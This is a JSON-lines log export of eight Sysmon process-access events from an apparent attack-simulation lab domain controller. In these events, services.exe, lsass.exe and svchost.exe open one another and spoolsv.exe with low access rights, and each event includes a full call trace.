{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1168,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.812\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001020530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 1128\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-001076B50200}\r\nTargetProcessId: 2440\r\nTargetImage: C:\\Windows\\System32\\spoolsv.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.812","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001020530000}","SourceProcessId":"856","SourceThreadId":"1128","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-001076B50200}","TargetProcessId":"2440","TargetImage":"C:\\Windows\\System32\\spoolsv.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1169,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.816\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-001076B50200}\r\nTargetProcessId: 2440\r\nTargetImage: C:\\Windows\\System32\\spoolsv.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.816","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-001076B50200}","TargetProcessId":"2440","TargetImage":"C:\\Windows\\System32\\spoolsv.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1170,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.816\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-001076B50200}\r\nTargetProcessId: 2440\r\nTargetImage: C:\\Windows\\System32\\spoolsv.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.816","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-001076B50200}","TargetProcessId":"2440","TargetImage":"C:\\Windows\\System32\\spoolsv.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1171,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.823\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001020530000}\r\nTargetProcessId: 856\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.823","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001020530000}","TargetProcessId":"856","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1172,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.823\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 108\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001020530000}\r\nTargetProcessId: 856\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.823","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"108","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001020530000}","TargetProcessId":"856","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1173,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.823\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 1108\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001020530000}\r\nTargetProcessId: 856\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.823","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"1108","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001020530000}","TargetProcessId":"856","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1174,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.823\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.823","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1175,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:45.823\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 716\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:45.823","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"716","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
